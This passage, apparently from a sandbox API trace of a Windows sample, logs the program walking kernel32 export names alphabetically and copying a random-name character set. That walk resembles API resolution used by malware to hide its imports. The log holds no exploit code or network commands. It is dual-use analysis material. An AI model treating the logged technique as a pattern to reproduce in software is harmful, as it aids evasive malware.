lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.255] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.255] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.255] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.255] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.255] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.255] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.255] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.255] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.256] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.256] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.256] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.256] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.256] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.256] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.256] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.256] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.256] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.256] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.256] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.256] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.256] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.256] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.256] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.256] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.256] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.257] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.257] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.257] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.257] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.257] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.257] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.257] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.257] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.257] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.257] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.257] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.257] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.257] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.257] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.257] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.257] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.257] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.257] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.257] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.258] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.258] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.258] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.258] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.258] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.258] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.258] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.258] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.258] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.258] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.258] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.258] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.258] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.258] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.258] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.258] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.258] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.258] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.258] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.258] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.259] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.259] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.259] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.259] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.259] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.259] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.259] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.259] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.259] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.259] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.259] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.259] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.259] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.259] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.259] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.259] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.259] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.259] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.259] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.260] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.260] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.260] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.260] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.260] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.260] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.260] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.260] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.260] lstrlenA (lpString="DELETEATOM") returned 10 [0079.260] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.260] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.260] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.260] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.260] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.260] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.260] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.260] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.260] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.260] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.260] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.260] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.261] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.261] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.261] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.261] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.261] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.261] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.261] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.261] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.261] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.261] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.261] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.261] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.261] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.261] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.261] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.261] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.261] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.261] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.261] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.262] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.262] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.262] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.262] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.262] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.262] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.262] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.262] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.262] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.262] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.262] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.262] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.262] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.262] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.262] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.262] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.262] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.263] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.263] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 